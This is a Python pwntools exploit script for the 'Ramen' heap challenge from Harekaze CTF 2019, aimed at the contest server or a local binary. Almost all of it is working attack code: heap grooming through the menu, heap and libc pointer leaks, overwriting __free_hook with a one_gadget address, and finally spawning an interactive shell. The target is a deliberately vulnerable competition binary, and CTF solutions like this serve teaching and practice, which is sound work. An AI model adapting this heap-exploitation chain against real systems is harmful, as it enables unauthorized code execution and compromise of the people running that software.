Exploit code for "Ramen" (pwn) from Harekaze CTF 2019 — the remote target below is problem.harekaze.com.
from pwn import *
import sys
# Tube setup. DEBUG logging dumps every send/recv, which is what you want while
# tuning the order/serve sequence below (turn it down once the chain is stable).
context.log_level = 'DEBUG'

# No CLI argument -> drive the local binary; any argument -> the challenge server.
p = process('./ramen') if len(sys.argv) == 1 else remote('problem.harekaze.com', '20004')
def order(a, egg, pork, shoots, topping):
    """Menu option 1: place an order.

    ``a`` and the three ingredient answers are stringified before being sent.
    ``topping`` is sent verbatim (no ``str()``), which is what lets callers push
    raw ``p64`` payloads into the topping field.
    """
    p.sendafter("Choice: ", "1")
    for prompt, answer in (("Choice: ", a), ("? ", egg), ("? ", pork), ("? ", shoots)):
        p.sendafter(prompt, str(answer))
    p.sendafter(": ", topping)
def serve():
    """Menu option 2: serve the current bowl (no further prompts).

    The program echoes the bowl's toppings afterwards; the main script relies
    on that echo (``recvuntil('toppings: ')``) to harvest pointer leaks.
    """
    choice = "2"
    p.sendafter("Choice: ", choice)
def change(size):
    """Menu option 3: set the size used by subsequent orders."""
    for prompt, value in (("Choice: ", "3"), (": ", str(size))):
        p.sendafter(prompt, value)
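# libc offsets. These are tied to ONE specific libc build (presumably the one
# shipped with the challenge); on any other build they are simply wrong, so
# re-derive them from the provided libc before reusing this script.
LIBC_LEAK_OFFSET = 0x3ebca0    # leaked pointer - libc base       (TODO confirm)
FREE_HOOK_OFFSET = 0x3ed8e8    # free_hook                        (TODO confirm)
ONE_GADGET_OFFSET = 0x4f322    # one_gadget-style execve gadget   (TODO confirm)


def read_topping_leak():
    """Read and unpack the 6-byte pointer echoed after 'toppings: '.

    Returns the value as an int and logs it. The pad byte is ``b'\\x00'`` rather
    than ``'\\x00'`` so this also works on Python 3 pwntools, where ``recv``
    returns ``bytes`` (a ``str`` fill char raises TypeError there).
    """
    value = u64(p.recv(6).ljust(8, b'\x00'))
    log.info('leak = 0x%x' % value)
    return value


# --- Stage 1: heap grooming, then a first (heap) pointer leak ----------------
# The exact order/serve sequence is the heap shape the bug needs; it was tuned
# against the challenge binary and should not be reordered casually.
change(31)
order(2, 1, 1, 1, '0000')
change(7)
for i in range(1, 6):
    order(2, 1, 1, 1, str(i) * 4)
for _ in range(6):
    serve()

change(1)
order(2, 1, 1, 1, '5555')
change(1)
serve()
order(2, 1, 1, 1, '3333')
change(1)
serve()
serve()

p.recvuntil('toppings: ')
leak = read_topping_leak()

# --- Stage 2: crafted toppings carrying heap addresses, then a libc leak -----
change(4)
order(2, 1, 1, 1, p64(leak + 0x80 + 0x90) * 2)
# The original also built p64(1)+p64(0xdeadbeef) here and then discarded it;
# only the address pair below was ever sent, so that dead assignment is gone.
payload = p64(leak + 0x60 + 0xa0 + 0xe0 + 0x10) * 2
order(2, 1, 1, 1, payload)
order(2, 1, 1, 1, payload)
serve()
serve()
serve()

p.recvuntil('toppings: ')
leak = read_topping_leak()
libc = leak - LIBC_LEAK_OFFSET
free_hook = libc + FREE_HOOK_OFFSET
oneshot = libc + ONE_GADGET_OFFSET
log.info('libc base = 0x%x' % libc)

# --- Stage 3: steer an allocation onto free_hook, write the gadget, trigger --
# The gadget address is written via the topping field; the final serve() is the
# menu action that fires it. one_gadget-style gadgets carry register/stack
# constraints, so if no shell appears try the next candidate gadget offset.
order(2, 1, 1, 1, p64(free_hook))
order(2, 1, 1, 1, p64(free_hook))
order(2, 1, 1, 1, p64(oneshot))
serve()
p.interactive()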